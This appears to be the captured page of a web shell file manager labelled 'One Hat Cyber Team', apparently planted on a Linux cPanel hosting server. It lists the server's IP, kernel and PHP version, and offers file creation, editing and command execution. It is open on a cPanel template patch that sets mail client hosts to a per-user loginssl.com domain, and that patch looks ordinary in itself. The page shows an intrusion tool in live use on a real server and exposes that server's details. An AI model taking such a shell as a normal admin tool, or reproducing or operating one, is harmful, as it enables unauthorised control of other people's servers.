One Hat Cyber Team
Your IP :
216.73.217.176
Server IP :
185.33.55.30
Server :
Linux cl30.webspacecontrol.com 5.14.0-611.38.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 10 17:21:28 EDT 2026 x86_64
Server Software :
Apache
PHP Version :
8.3.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
opt
/
Edit File:
loginssl.tt.patch
--- clientconfinclude.html.tt.orig 2020-02-26 18:14:41.686815697 +0100 +++ clientconfinclude.html.tt 2020-02-26 18:15:54.303543162 +0100 @@ -16,6 +16,9 @@ SET mail_client_settings = execute('Email','get_client_settings',{account=>CPANEL.FORM.acct}).data; END; +SET loginssl = CPANEL.user _ '.loginssl.com'; +SET mail_client_settings.inbox_host = loginssl; +SET mail_client_settings.smtp_host = loginssl; SET apps = []; SET proxysubdomains = CPANEL.CPCONF().proxysubdomains && CPANEL.CPCONF().autodiscover_proxy_subdomains;
Simpan